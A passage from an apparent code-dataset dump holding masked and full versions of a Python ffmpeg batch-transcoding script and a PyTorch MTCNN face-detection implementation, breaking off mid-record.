os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\n\ndef del_files():\n pass\n\n\ndef itr_ts_files():\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\n\ndef transcode():\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n print(e)\n return\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_work_base(f_base):\n re_num = re.compile('(\\\\d+)\\\\-.+')\n r = re_num.search(f_base)\n res = ''\n if r:\n print(r.group(1))\n res = r.group(1)\n else:\n print('error... cant find f_base.')\n return res\n\n\ndef chk_tmp_file(f_tmp):\n pass\n\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n opt = (\n '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n )\n enc_args = opt % vars()\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\n\ndef del_files():\n pass\n\n\ndef itr_ts_files():\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\n\ndef transcode():\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n print(e)\n return\n\n\nif __name__ == '__main__':\n transcode()\n",
"step-4": "<mask token>\npath_ffmpeg = 'C:\\\\work\\\\ffmpeg\\\\ffmpeg-3.4.2-win64-static\\\\bin\\\\ffmpeg.exe'\ndir_ts_files = 'E:\\\\ts'\ndir_output = 'E:\\\\hb'\npath_lock = 'C:\\\\work\\\\ffmpeg\\\\encode.lock'\n\n\ndef get_work_base(f_base):\n re_num = re.compile('(\\\\d+)\\\\-.+')\n r = re_num.search(f_base)\n res = ''\n if r:\n print(r.group(1))\n res = r.group(1)\n else:\n print('error... cant find f_base.')\n return res\n\n\ndef chk_tmp_file(f_tmp):\n pass\n\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n opt = (\n '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n )\n enc_args = opt % vars()\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\n\ndef del_files():\n pass\n\n\ndef itr_ts_files():\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\n\ndef transcode():\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n print(e)\n return\n\n\nif __name__ == '__main__':\n transcode()\n",
"step-5": "\n\nimport os\nimport subprocess\nimport re\n# import fcntl\n\n# path_ffmpeg = \npath_ffmpeg = r'C:\\work\\ffmpeg\\ffmpeg-3.4.2-win64-static\\bin\\ffmpeg.exe'\ndir_ts_files = r'E:\\ts'\ndir_output = r'E:\\hb'\npath_lock = r'C:\\work\\ffmpeg\\encode.lock'\n\ndef get_work_base(f_base):\n re_num = re.compile(r'(\\d+)\\-.+')\n r = re_num.search(f_base)\n res = ''\n if r:\n print(r.group(1))\n res = r.group(1)\n else:\n print('error... cant find f_base.')\n return res\n\ndef chk_tmp_file(f_tmp):\n pass\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n \n #opt = '-i %(f_in)s -vf scale=720:-1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'\n #opt = '-i %(f_in)s -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -g 1 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'\n opt = '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n #opt = '-i %(f_in)s -vf scale=840:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 26 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'\n enc_args = opt % vars()\n\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n\n # cmd = ' '.join([ffmpeg, f_in, f_out])\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n # res = subprocess.run([ffmpeg, enc_args], stdout=subprocess.PIPE)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n #return res\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\ndef del_files():\n pass\n\ndef itr_ts_files():\n # [print(path) for path in os.listdir(dir_ts) if path.endswith('.ts')]\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\ndef transcode():\n # 複数プロセス起動を防ぐためファイルロックを利用。x-modeでopen (for Windows)\n #os.remove(path_lock)\n #return\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n # print('ロックを獲得できませんでした... エンコード中')\n print(e)\n return\n\n\n# TODO\n# tmp-file をロック。できなければ終了。\n# f_out があれば、終了。\n# f_in を削除 (正常終了の場合)\n# ts ファイルのステータスチェック(録画済か録画中か?)\n# ts ファイルをみつけて、エンコード開始\n\n\nif __name__ == '__main__':\n transcode()\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
import numpy as np
import torch
import torch.nn as nn
from torch.nn.functional import interpolate
from torchvision.ops.boxes import batched_nms
class MTCNN():
def __init__(self, device=None, model=None):
if device is None:
device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.device = device
url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'
if model is None:
model = torch.hub.load_state_dict_from_url(url)
else:
model = torch.load(model, map_location=device)
self.pnet = PNet().to(device)
self.rnet = RNet().to(device)
self.onet = ONet().to(device)
self.pnet.load_state_dict(model['pnet'])
self.rnet.load_state_dict(model['rnet'])
self.onet.load_state_dict(model['onet'])
def detect(self, imgs, minsize=None):
if len(imgs) == 0:
return []
if isinstance(imgs[0], np.ndarray):
h, w = imgs[0].shape[:2]
else:
w, h = imgs[0].size
if minsize is None:
minsize = max(96 * min(w, h)/1080, 40)
boxes, points = [], []
with torch.no_grad():
batches = [imgs[i:i+10] for i in range(0, len(imgs), 10)]
for batch in batches:
batch_boxes, batch_points = detect_face(
batch, minsize, self.pnet, self.rnet, self.onet,
[0.7, 0.8, 0.9], 0.709, self.device)
boxes += list(batch_boxes)
points += list(batch_points)
result = []
for box, point in zip(boxes, points):
box = np.array(box)
point = np.array(point)
if len(box) == 0:
result.append(None)
else:
result.append((box[:, :4], box[:, 4], point))
return result
def empty_cache(device):
if 'cuda' in device:
with torch.cuda.device(device):
torch.cuda.empty_cache()
class PNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 10, kernel_size=3)
self.prelu1 = nn.PReLU(10)
self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)
self.conv2 = nn.Conv2d(10, 16, kernel_size=3)
self.prelu2 = nn.PReLU(16)
self.conv3 = nn.Conv2d(16, 32, kernel_size=3)
self.prelu3 = nn.PReLU(32)
self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)
self.softmax4_1 = nn.Softmax(dim=1)
self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)
def forward(self, x):
x = self.conv1(x)
x = self.prelu1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.prelu2(x)
x = self.conv3(x)
x = self.prelu3(x)
a = self.conv4_1(x)
a = self.softmax4_1(a)
b = self.conv4_2(x)
return b, a
class RNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 28, kernel_size=3)
self.prelu1 = nn.PReLU(28)
self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)
self.conv2 = nn.Conv2d(28, 48, kernel_size=3)
self.prelu2 = nn.PReLU(48)
self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)
self.conv3 = nn.Conv2d(48, 64, kernel_size=2)
self.prelu3 = nn.PReLU(64)
self.dense4 = nn.Linear(576, 128)
self.prelu4 = nn.PReLU(128)
self.dense5_1 = nn.Linear(128, 2)
self.softmax5_1 = nn.Softmax(dim=1)
self.dense5_2 = nn.Linear(128, 4)
def forward(self, x):
x = self.conv1(x)
x = self.prelu1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.prelu2(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.prelu3(x)
x = x.permute(0, 3, 2, 1).contiguous()
x = self.dense4(x.view(x.shape[0], -1))
x = self.prelu4(x)
a = self.dense5_1(x)
a = self.softmax5_1(a)
b = self.dense5_2(x)
return b, a
class ONet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3)
self.prelu1 = nn.PReLU(32)
self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)
self.conv2 = nn.Conv2d(32, 64, kernel_size=3)
self.prelu2 = nn.PReLU(64)
self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3)
self.prelu3 = nn.PReLU(64)
self.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)
self.conv4 = nn.Conv2d(64, 128, kernel_size=2)
self.prelu4 = nn.PReLU(128)
self.dense5 = nn.Linear(1152, 256)
self.prelu5 = nn.PReLU(256)
self.dense6_1 = nn.Linear(256, 2)
self.softmax6_1 = nn.Softmax(dim=1)
self.dense6_2 = nn.Linear(256, 4)
self.dense6_3 = nn.Linear(256, 10)
def forward(self, x):
x = self.conv1(x)
x = self.prelu1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.prelu2(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.prelu3(x)
x = self.pool3(x)
x = self.conv4(x)
x = self.prelu4(x)
x = x.permute(0, 3, 2, 1).contiguous()
x = self.dense5(x.view(x.shape[0], -1))
x = self.prelu5(x)
a = self.dense6_1(x)
a = self.softmax6_1(a)
b = self.dense6_2(x)
c = self.dense6_3(x)
return b, c, a
def detect_face(imgs, minsize, pnet, rnet, onet, threshold, factor, device):
if isinstance(imgs, (np.ndarray, torch.Tensor)):
imgs = torch.as_tensor(imgs, device=device)
if len(imgs.shape) == 3:
imgs = imgs.unsqueeze(0)
else:
if not isinstance(imgs, (list, tuple)):
imgs = [imgs]
if any(img.size != imgs[0].size for img in imgs):
raise Exception("MTCNN batch processing only compatible with equal-dimension images.")
imgs = np.stack([np.uint8(img) for img in imgs])
imgs = torch.as_tensor(imgs, device=device)
model_dtype = next(pnet.parameters()).dtype
imgs = imgs.permute(0, 3, 1, 2).type(model_dtype)
batch_size = len(imgs)
h, w = imgs.shape[2:4]
m = 12.0 / minsize
minl = min(h, w)
minl = minl * m
# Create scale pyramid
scale_i = m
scales = []
while minl >= 12:
scales.append(scale_i)
scale_i = scale_i * factor
minl = minl * factor
# First stage
boxes = []
image_inds = []
all_inds = []
all_i = 0
for scale in scales:
im_data = imresample(imgs, (int(h * scale + 1), int(w * scale + 1)))
im_data = (im_data - 127.5) * 0.0078125
reg, probs = pnet(im_data)
empty_cache(device)
boxes_scale, image_inds_scale = generateBoundingBox(reg, probs[:, 1], scale, threshold[0])
boxes.append(boxes_scale)
image_inds.append(image_inds_scale)
all_inds.append(all_i + image_inds_scale)
all_i += batch_size
boxes = torch.cat(boxes, dim=0)
image_inds = torch.cat(image_inds, dim=0).cpu()
all_inds = torch.cat(all_inds, dim=0)
# NMS within each scale + image
pick = batched_nms(boxes[:, :4], boxes[:, 4], all_inds, 0.5)
boxes, image_inds = boxes[pick], image_inds[pick]
# NMS within each image
pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)
boxes, image_inds = boxes[pick], image_inds[pick]
regw = boxes[:, 2] - boxes[:, 0]
regh = boxes[:, 3] - boxes[:, 1]
qq1 = boxes[:, 0] + boxes[:, 5] * regw
qq2 = boxes[:, 1] + boxes[:, 6] * regh
qq3 = boxes[:, 2] + boxes[:, 7] * regw
qq4 = boxes[:, 3] + boxes[:, 8] * regh
boxes = torch.stack([qq1, qq2, qq3, qq4, boxes[:, 4]]).permute(1, 0)
boxes = rerec(boxes)
y, ey, x, ex = pad(boxes, w, h)
# Second stage
if len(boxes) > 0:
im_data = []
for k in range(len(y)):
if ey[k] > (y[k] - 1) and ex[k] > (x[k] - 1):
img_k = imgs[image_inds[k], :, (y[k] - 1):ey[k], (x[k] - 1):ex[k]].unsqueeze(0)
im_data.append(imresample(img_k, (24, 24)))
im_data = torch.cat(im_data, dim=0)
im_data = (im_data - 127.5) * 0.0078125
out = []
for batch in im_data.split(2000):
out += [rnet(batch)]
z = list(zip(*out))
out = (torch.cat(z[0]), torch.cat(z[1]))
empty_cache(device)
out0 = out[0].permute(1, 0)
out1 = out[1].permute(1, 0)
score = out1[1, :]
ipass = score > threshold[1]
boxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)
image_inds = image_inds[ipass]
mv = out0[:, ipass].permute(1, 0)
# NMS within each image
pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)
boxes, image_inds, mv = boxes[pick], image_inds[pick], mv[pick]
boxes = bbreg(boxes, mv)
boxes = rerec(boxes)
# Third stage
points = torch.zeros(0, 5, 2, device=device)
if len(boxes) > 0:
y, ey, x, ex = pad(boxes, w, h)
im_data = []
for k in range(len(y)):
if ey[k] > (y[k] - 1) and ex[k] > (x[k] - 1):
img_k = imgs[image_inds[k], :, (y[k] - 1):ey[k], (x[k] - 1):ex[k]].unsqueeze(0)
im_data.append(imresample(img_k, (48, 48)))
im_data = torch.cat(im_data, dim=0)
im_data = (im_data - 127.5) * 0.0078125
out = []
for batch in im_data.split(500):
out += [onet(batch)]
z = list(zip(*out))
out = (torch.cat(z[0]), torch.cat(z[1]), torch.cat(z[2]))
empty_cache(device)
out0 = out[0].permute(1, 0)
out1 = out[1].permute(1, 0)
out2 = out[2].permute(1, 0)
score = out2[1, :]
points = out1
ipass = score > threshold[2]
points = points[:, ipass]
boxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)
image_inds = image_inds[ipass]
mv = out0[:, ipass].permute(1, 0)
w_i = boxes[:, 2] - boxes[:, 0] + 1
h_i = boxes[:, 3] - boxes[:, 1] + 1
points_x = w_i.repeat(5, 1) * points[:5, :] + boxes[:, 0].repeat(5, 1) - 1
points_y = h_i.repeat(5, 1) * points[5:10, :] + boxes[:, 1].repeat(5, 1) - 1
points = torch.stack((points_x, points_y)).permute(2, 1, 0)
boxes = bbreg(boxes, mv)
# NMS within each image using "Min" strategy
# pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)
pick = batched_nms_numpy(boxes[:, :4], boxes[:, 4], image_inds, 0.7, 'Min')
boxes, image_inds, points = boxes[pick], image_inds[pick], points[pick]
boxes = boxes.cpu().numpy()
points = points.cpu().numpy()
batch_boxes = []
batch_points = []
for b_i in range(batch_size):
b_i_inds = np.where(image_inds == b_i)
batch_boxes.append(boxes[b_i_inds].copy())
batch_points.append(points[b_i_inds].copy())
batch_boxes, batch_points = np.array(batch_boxes), np.array(batch_points)
empty_cache(device)
return batch_boxes, batch_points
def bbreg(boundingbox, reg):
if reg.shape[1] == 1:
reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
b1 = boundingbox[:, 0] + reg[:, 0] * w
b2 = boundingbox[:, 1] + reg[:, 1] * h
b3 = boundingbox[:, 2] + reg[:, 2] * w
b4 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)
return boundingbox
def generateBoundingBox(reg, probs, scale, thresh):
stride = 2
cellsize = 12
reg = reg.permute(1, 0, 2, 3)
mask = probs >= thresh
mask_inds = mask.nonzero(as_tuple=False)
image_inds = mask_inds[:, 0]
score = probs[mask]
reg = reg[:, mask].permute(1, 0)
bb = mask_inds[:, 1:].type(reg.dtype).flip(1)
q1 = ((stride * bb + 1) / scale).floor()
q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()
boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)
return boundingbox, image_inds
def nms_numpy(boxes, scores, threshold, method):
if boxes.size == 0:
return np.empty((0, 3))
x1 = boxes[:, 0].copy()
y1 = boxes[:, 1].copy()
x2 = boxes[:, 2].copy()
y2 = boxes[:, 3].copy()
s = scores
area = (x2 - x1 + 1) * (y2 - y1 + 1)
I = np.argsort(s)
pick = np.zeros_like(s, dtype=np.int16)
counter = 0
while I.size > 0:
i = I[-1]
pick[counter] = i
counter += 1
idx = I[0:-1]
xx1 = np.maximum(x1[i], x1[idx]).copy()
yy1 = np.maximum(y1[i], y1[idx]).copy()
xx2 = np.minimum(x2[i], x2[idx]).copy()
yy2 = np.minimum(y2[i], y2[idx]).copy()
w = np.maximum(0.0, xx2 - xx1 + 1).copy()
h = np.maximum(0.0, yy2 - yy1 + 1).copy()
inter = w * h
if method == "Min":
o = inter / np.minimum(area[i], area[idx])
else:
o = inter / (area[i] + area[idx] - inter)
I = I[np.where(o <= threshold)]
pick = pick[:counter].copy()
return pick
def batched_nms_numpy(boxes, scores, idxs, threshold, method):
device = boxes.device
if boxes.numel() == 0:
return torch.empty((0,), dtype=torch.int64, device=device)
# strategy: in order to perform NMS independently per class.
# we add an offset to all the boxes. The offset is dependent
# only on the class idx, and is large enough so that boxes
# from different classes do not overlap
max_coordinate = boxes.max()
offsets = idxs.to(boxes) * (max_coordinate + 1)
boxes_for_nms = boxes + offsets[:, None]
boxes_for_nms = boxes_for_nms.cpu().numpy()
scores = scores.cpu().numpy()
keep = nms_numpy(boxes_for_nms, scores, threshold, method)
return torch.as_tensor(keep, dtype=torch.long, device=device)
def pad(boxes, w, h):
boxes = boxes.trunc().int().cpu().numpy()
x = boxes[:, 0]
y = boxes[:, 1]
ex = boxes[:, 2]
ey = boxes[:, 3]
x[x < 1] = 1
y[y < 1] = 1
ex[ex > w] = w
ey[ey > h] = h
return y, ey, x, ex
def rerec(bboxA):
h = bboxA[:, 3] - bboxA[:, 1]
w = bboxA[:, 2] - bboxA[:, 0]
l = torch.max(w, h)
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - l * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - l * 0.5
bboxA[:, 2:4] = bboxA[:, :2] + l.repeat(2, 1).permute(1, 0)
return bboxA
def imresample(img, sz):
im_data = interpolate(img, size=sz, mode="area")
return im_data
|
normal
|
{
"blob_id": "865121e7eb5f9c70adf44d33d21f30c22f13ec56",
"index": 7012,
"step-1": "<mask token>\n\n\nclass MTCNN:\n\n def __init__(self, device=None, model=None):\n if device is None:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = device\n url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n if model is None:\n model = torch.hub.load_state_dict_from_url(url)\n else:\n model = torch.load(model, map_location=device)\n self.pnet = PNet().to(device)\n self.rnet = RNet().to(device)\n self.onet = ONet().to(device)\n self.pnet.load_state_dict(model['pnet'])\n self.rnet.load_state_dict(model['rnet'])\n self.onet.load_state_dict(model['onet'])\n\n def detect(self, imgs, minsize=None):\n if len(imgs) == 0:\n return []\n if isinstance(imgs[0], np.ndarray):\n h, w = imgs[0].shape[:2]\n else:\n w, h = imgs[0].size\n if minsize is None:\n minsize = max(96 * min(w, h) / 1080, 40)\n boxes, points = [], []\n with torch.no_grad():\n batches = [imgs[i:i + 10] for i in range(0, len(imgs), 10)]\n for batch in batches:\n batch_boxes, batch_points = detect_face(batch, minsize,\n self.pnet, self.rnet, self.onet, [0.7, 0.8, 0.9], 0.709,\n self.device)\n boxes += list(batch_boxes)\n points += list(batch_points)\n result = []\n for box, point in zip(boxes, points):\n box = np.array(box)\n point = np.array(point)\n if len(box) == 0:\n result.append(None)\n else:\n result.append((box[:, :4], box[:, 4], point))\n return result\n\n\n<mask token>\n\n\nclass PNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n self.prelu1 = nn.PReLU(10)\n self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n self.prelu2 = nn.PReLU(16)\n self.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n self.prelu3 = nn.PReLU(32)\n self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n self.softmax4_1 = nn.Softmax(dim=1)\n self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n a = self.conv4_1(x)\n a = self.softmax4_1(a)\n b = self.conv4_2(x)\n return b, a\n\n\nclass RNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n self.prelu1 = nn.PReLU(28)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n self.prelu2 = nn.PReLU(48)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n self.prelu3 = nn.PReLU(64)\n self.dense4 = nn.Linear(576, 128)\n self.prelu4 = nn.PReLU(128)\n self.dense5_1 = nn.Linear(128, 2)\n self.softmax5_1 = nn.Softmax(dim=1)\n self.dense5_2 = nn.Linear(128, 4)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense4(x.view(x.shape[0], -1))\n x = self.prelu4(x)\n a = self.dense5_1(x)\n a = self.softmax5_1(a)\n b = self.dense5_2(x)\n return b, a\n\n\nclass ONet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n self.prelu1 = nn.PReLU(32)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n self.prelu2 = nn.PReLU(64)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3)\n self.prelu3 = nn.PReLU(64)\n self.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n self.prelu4 = nn.PReLU(128)\n self.dense5 = nn.Linear(1152, 256)\n self.prelu5 = nn.PReLU(256)\n self.dense6_1 = nn.Linear(256, 2)\n self.softmax6_1 = nn.Softmax(dim=1)\n self.dense6_2 = nn.Linear(256, 4)\n self.dense6_3 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = self.pool3(x)\n x = self.conv4(x)\n x = self.prelu4(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense5(x.view(x.shape[0], -1))\n x = self.prelu5(x)\n a = self.dense6_1(x)\n a = self.softmax6_1(a)\n b = self.dense6_2(x)\n c = self.dense6_3(x)\n return b, c, a\n\n\n<mask token>\n\n\ndef bbreg(boundingbox, reg):\n if reg.shape[1] == 1:\n reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n w = boundingbox[:, 2] - boundingbox[:, 0] + 1\n h = boundingbox[:, 3] - boundingbox[:, 1] + 1\n b1 = boundingbox[:, 0] + reg[:, 0] * w\n b2 = boundingbox[:, 1] + reg[:, 1] * h\n b3 = boundingbox[:, 2] + reg[:, 2] * w\n b4 = boundingbox[:, 3] + reg[:, 3] * h\n boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n return boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n stride = 2\n cellsize = 12\n reg = reg.permute(1, 0, 2, 3)\n mask = probs >= thresh\n mask_inds = mask.nonzero(as_tuple=False)\n image_inds = mask_inds[:, 0]\n score = probs[mask]\n reg = reg[:, mask].permute(1, 0)\n bb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n q1 = ((stride * bb + 1) / scale).floor()\n q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n return boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n if boxes.size == 0:\n return np.empty((0, 3))\n x1 = boxes[:, 0].copy()\n y1 = boxes[:, 1].copy()\n x2 = boxes[:, 2].copy()\n y2 = boxes[:, 3].copy()\n s = scores\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n I = np.argsort(s)\n pick = np.zeros_like(s, dtype=np.int16)\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[counter] = i\n counter += 1\n idx = I[0:-1]\n xx1 = np.maximum(x1[i], x1[idx]).copy()\n yy1 = np.maximum(y1[i], y1[idx]).copy()\n xx2 = np.minimum(x2[i], x2[idx]).copy()\n yy2 = np.minimum(y2[i], y2[idx]).copy()\n w = np.maximum(0.0, xx2 - xx1 + 1).copy()\n h = np.maximum(0.0, yy2 - yy1 + 1).copy()\n inter = w * h\n if method == 'Min':\n o = inter / np.minimum(area[i], area[idx])\n else:\n o = inter / (area[i] + area[idx] - inter)\n I = I[np.where(o <= threshold)]\n pick = pick[:counter].copy()\n return pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n device = boxes.device\n if boxes.numel() == 0:\n return torch.empty((0,), dtype=torch.int64, device=device)\n max_coordinate = boxes.max()\n offsets = idxs.to(boxes) * (max_coordinate + 1)\n boxes_for_nms = boxes + offsets[:, None]\n boxes_for_nms = boxes_for_nms.cpu().numpy()\n scores = scores.cpu().numpy()\n keep = nms_numpy(boxes_for_nms, scores, threshold, method)\n return torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\n<mask token>\n\n\ndef imresample(img, sz):\n im_data = interpolate(img, size=sz, mode='area')\n return im_data\n",
"step-2": "<mask token>\n\n\nclass MTCNN:\n\n def __init__(self, device=None, model=None):\n if device is None:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = device\n url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n if model is None:\n model = torch.hub.load_state_dict_from_url(url)\n else:\n model = torch.load(model, map_location=device)\n self.pnet = PNet().to(device)\n self.rnet = RNet().to(device)\n self.onet = ONet().to(device)\n self.pnet.load_state_dict(model['pnet'])\n self.rnet.load_state_dict(model['rnet'])\n self.onet.load_state_dict(model['onet'])\n\n def detect(self, imgs, minsize=None):\n if len(imgs) == 0:\n return []\n if isinstance(imgs[0], np.ndarray):\n h, w = imgs[0].shape[:2]\n else:\n w, h = imgs[0].size\n if minsize is None:\n minsize = max(96 * min(w, h) / 1080, 40)\n boxes, points = [], []\n with torch.no_grad():\n batches = [imgs[i:i + 10] for i in range(0, len(imgs), 10)]\n for batch in batches:\n batch_boxes, batch_points = detect_face(batch, minsize,\n self.pnet, self.rnet, self.onet, [0.7, 0.8, 0.9], 0.709,\n self.device)\n boxes += 